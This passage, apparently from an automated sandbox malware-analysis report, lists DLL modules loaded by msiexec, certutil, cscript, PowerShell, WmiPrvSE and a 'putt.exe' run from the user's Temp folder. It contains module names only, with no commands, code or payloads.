            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpSection loaded: msi.dllJump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: comsvcs.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
